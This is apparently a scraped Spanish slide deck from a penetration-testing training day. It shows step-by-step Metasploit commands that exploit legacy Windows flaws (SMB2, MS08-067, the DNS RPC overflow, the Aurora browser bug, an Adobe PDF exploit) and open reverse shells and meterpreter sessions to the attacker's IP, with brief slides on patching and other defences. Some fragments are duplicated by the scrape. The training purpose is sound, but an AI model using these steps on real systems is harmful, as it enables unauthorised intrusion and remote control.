SECURITY DAY PERU. Ataques a la familia de Sistemas Operativos Windows. Explotando Vulnerabilidades a Servicios / Ataques a Clientes.

Tamaño: px

Comenzar la demostración a partir de la página:

Download "SECURITY DAY PERU. Ataques a la familia de Sistemas Operativos Windows. Explotando Vulnerabilidades a Servicios / Ataques a Clientes."

Natalia Irene Cano Miguélez
hace 8 años
Vistas:

SOLUTIONS FOR KEEPING YOUR BUSINESS UP Email: info@ximark.com Tel. +(507) 271 5951 Tel. +(1) 928 752 1325 Aptdo. 55-0444, Paitilla.

1 SOLUTIONS FOR KEEPING YOUR BUSINESS UP Tel. +(507) Tel. +(1) Aptdo , Paitilla. Panama City, Panama SECURITY DAY PERU Ataques a la familia de Sistemas Operativos Windows Explotando Vulnerabilidades a Servicios / Ataques a Clientes Technologies 1

2 Security Day> Perú> Agenda Lab 1. Explotando Vulnerabilidad de SMB v2 (ms09_050_smb2) Equipo Afectado Server Windows 2008 (Role de File Server) Lab 2. Explotando Vulnerabilidad de RPC (ms08_067_netapi) Equipo afectado Windows Server 2003 (Cualquier Role) Lab 3. Explotando Vulnerabilidad de DNS (ms07_029_msdns_zonename) Equipo afectado Windows Server 2003 (Controlador de Dominio) Lab 4. Explotando Vulnerabilidad de Iexplorer (ms10_002_aurora) Lab 5. Explotando Vulnerabilidad de Acrobat Sing 2

Explotando Vulnerabilidad de RPC (ms08_067_netapi) Equipo afectado Windows Server 2003 (Cualquier Role) Lab 3.

3 Aprovechando vulnerabilidades> Ataque vía vulnerabilidad ms09_050_smb2 Esta vulnerabilidad aprovecha el manejo que utiliza el sistema operativo a los paquetes Server Message Block (SMB versión 2). Enviando paquetes maliciosos un atacante puede lograr el acceso al equipo afectado con privilegios administrativos. Afecta a la familia de sistemas Windows 2008 y Windows Vista. 3

4 Aprovechando vulnerabilidades> Lab vulnerabilidad ms09_050_smb2 Desde nuestro Backtrack vamos al directorio de Metasploit3 cd /pentest/exploits/framework3 Ejecutamos el comando./msfconsole para interactuar con el shell de metasploit../msfconsole Realizamos la búsqueda de la vulnerabilidad dentro del framework. search smb2 Lo anterior nos volcará diferentes resultados con el contenido del parámetro de búsqueda. Elegimos el exploit a utilizar asi: use windows/smb/ms09_050_smb2_negotiate_func_index 4

./msfconsole Realizamos la búsqueda de la vulnerabilidad dentro del framework.

5 Aprovechando vulnerabilidades> Lab vulnerabilidad ms09_050_smb2 Revisamos las opciones de configuración del exploit show options Configuramos las opciones así: set RHOST ip_victima set LHOST ip_atacante set TARGET 0 Buscamos el PAYLOAD a utilizar. show payloads Elegimos el PAYLOAD. set PAYLOAD windows/meterpreter/reverse_tcp Configuramos tiempo de espera de ejecucion del exploit, lanzamos nuestro exploit. set wait 60 exploit 5

Buscamos el PAYLOAD a utilizar. show payloads Elegimos el PAYLOAD.

6 Aprovechando vulnerabilidades> Ataque vía vulnerabilidad MS08_67 Esta vulnerabilidad aprovecha el manejo de los paquetes RPC en los sistemas windows. Enviando un paquete malicioso se puede lograr la ejecución de programas o comando en el equipo afectado. Afecta a la familia de sistemas Windows 2000, Windows XP y Windows

Enviando un paquete malicioso se puede lograr la ejecución de programas o comando

7 Aprovechando vulnerabilidades> Lab vulnerabilidad MS08_67 Desde nuestro Backtrack vamos al directorio de Metasploit3 cd /pentest/exploits/framework3 Ejecutamos el comando./msfcli para hacer una busqueda del exploit../msfcli grep ms08_067 Una vez ubicado el exploit ejecutamos lo siguiente:./msfcli exploit/windows/smb/ms08_067_netapi RHOST=ip_victima PAYLOAD=windows/shell_reverse_tcp LHOST=ip_atacante E Lo anterior nos volcará un sesión de línea de comando del equipo victima 7

./msfcli grep ms08_067 Una vez ubicado el exploit ejecutamos lo siguiente:.

8 Aprovechando vulnerabilidades> Ataque vía vulnerabilidad MS07_029_MSDNS_ZONENAME Esta vulnerabilidad se basa en un ataque de Buffer Overflow hacia la interface RPC del Servicio DNS del equipo afectado. La vulnerabilidad se ejecuta enviando cadenas de caracteres largas con secuencias octales escapadas a nivel del servicio dns. Esto puede lograr la ejecución de programas o comandos en el equipo afectado con privilegios administrativos. Afecta a la familia de sistemas Windows

La vulnerabilidad se ejecuta enviando cadenas de caracteres largas con secuencias octales escapadas a nivel del servicio

Ataques a DNS > Buffer Overflows > Lab: Explotando DNS vía exploit de buffer overflow de RPC H. Hacker con PC Linux y Metasploit 2 1 Internet Previo al ataque H.

9 Ataques a DNS > Buffer Overflows > Lab: Explotando DNS vía exploit de buffer overflow de RPC H. Hacker con PC Linux y Metasploit 2 1 Internet Previo al ataque H. realiza un escaneo de puertos e identifica un equipo con win2k3 y el servicio DNS Nmap ss PN O vv (ip_victima) 1. Existe la posibilidad de que el servicio DNS pueda ser vulnerable cd /pentest/exploits/framework3./msfconsole (Levanta framework de explotación Metasploit) 2. Realiza la busqueda del exploit para RPC DNS de Windows y lo utiliza show exploits search msdns_zonename windows/dcerpc/ms07_029_msdns_zonename 3. Revisa las opciones del exploit y configura sus parámetros show options set RHOST ip_victima set LHOST ip_atacante set TARGET 0 (Versión y Plataforma de la Victima) SW. Servidor DNS Vulnerable 4. Busqueda, definición y Ejecución de PAYLOADS show PAYLOADS set PAYLOAD windows/shell_reverse_tcp (Reverse Shell Sesion de Linea de Comandos) set PAYLOAD windows/vncinject/reverse-tcp (Sesion Grafica de Reverso) exploit (Lanza el exploit) sessions l (L minuscula. Lista las sesiones establecidas) session i #de_sesión (Interactúa con la sesión previamente establecida) 2004 Ximark Technologies, Inc. Todos los derechos reservados. v.1.4 9

Existe la posibilidad de que el servicio DNS pueda ser vulnerable cd /pentest/exploits/framework3./msfconsole (Levanta framework de explotación Metasploit) 2.

Hacking de Sistemas Operativos Win NT/2000/XP > Ataques sin Autenticación > Ataques al IIS > Soluciones Filtre el ingreso y egreso de paquetes en el perímetro.

10 Hacking de Sistemas Operativos Win NT/2000/XP > Ataques sin Autenticación > Ataques al IIS > Soluciones Filtre el ingreso y egreso de paquetes en el perímetro. Mantenga los servidores de misión critica en una DMZ Política de administración de parches: Instale los últimos parches provistos por el fabricante Instale los últimos Service Packs Use NTFS Deshabilite servicios innecesarios Habilite las bitácoras de eventos Instale un IPS frente de los servidores Realice análisis de vulnerabilidades y pruebas de penetración periodicas 2004 Ximark Technologies, Inc. Todos los derechos reservados. v

Mantenga los servidores de misión critica en una DMZ Política de administración de parches: Instale los últimos parches provistos por el fabricante

11 Client Side Attacks> Ataques destinados a aprovechar debilidades (vulnerabilidades) en los navegadores de internet del usuario final. Ejm: IE6, IE7, Mozilla Firefox, Opera, etc. Se requiere un cliente (browser) y un servidor que cuelgue el exploit (metasploit) 11

final. Ejm: IE6, IE7, Mozilla Firefox, Opera, etc.

12 Client Side Attacks> Vulnerabilidad MS10_002_Aurora Desde nuestro Backtrack vamos al directorio de Metasploit3 cd /pentest/exploits/framework3 Ejecutamos el comando./msfconsole Para hacer una busqueda del exploit ejecutamos. search aurora Una vez ubicado el exploit ejecutamos lo siguiente: use windows/browser/ms10_002_aurora Configuramos las variables de entorno set LHOST (ip_atacante) set SRVHOST (ip_atacante) set URIPATH / set PAYLOAD windows/meterpreter/reverse_tcp 12

search aurora Una vez ubicado el exploit ejecutamos lo siguiente: use windows/browser/ms10_002_aurora Configuramos las

13 Client Side Attacks> Vulnerabilidad MS10_002_Aurora Lanzamos el exploit exploit Copiamos el URIPATH dado por metasploit [*] Started reverse handler on :4444 [*] Using URL: Nos vamos al virtual machine con Win XP. Abrimos el Iexplorer y pegamos el URIPATH Esto nos debe volcar una sesion de meterpreter en nuestro Backtrack4. Para ver la sesiones ejecutamos: sessions l Para interactuar con una sesion colocamos: sessions i 1 13

Abrimos el Iexplorer y pegamos el URIPATH http://192.168.10.

14 Client Side Attacks> Vulnerabilidad Adobe_Cooltype_Sing Desde nuestro Backtrack vamos al directorio de Metasploit3 cd /pentest/exploits/framework3 Ejecutamos el comando./msfconsole Para hacer una busqueda del exploit ejecutamos. search adobe Una vez ubicado el exploit ejecutamos lo siguiente: use windows/fileformat/adobe_cooltype_sing Revisar las variables de entorno Show options Configurar las variables de entorno set filename nombre-archivo.pdf set payload windows/meterpreter/reverse_tcp 14

search adobe Una vez ubicado el exploit ejecutamos lo siguiente: use windows/fileformat/adobe_cooltype_sing Revisar las

15 Client Side Attacks> Vulnerabilidad Adobe_Cooltype_Sing Configurar las variables de entorno (continuación..) set LHOST ip_atacante set LPORT puerto_a_escuchar exploit 15

16 Client Side Attacks> Soluciones Mantenga actualizado su navegador de internet Aplique los últimos parches y service packs del Sistema Operativo Sea cuidadoso al accesar links enviados por correo o chat 16

Documentos relacionados

Instalar MBSA y GFI Languard en Windows Server 2008 y hacer un análisis.

Actividad 4. Instalar MBSA y GFI Languard en Windows Server 2008 y hacer un análisis. MBSA: instalamos Microsoft Baseline Security Analyzer (es gratis), y pulsamos en la opción Scan a computer. GFI Languard: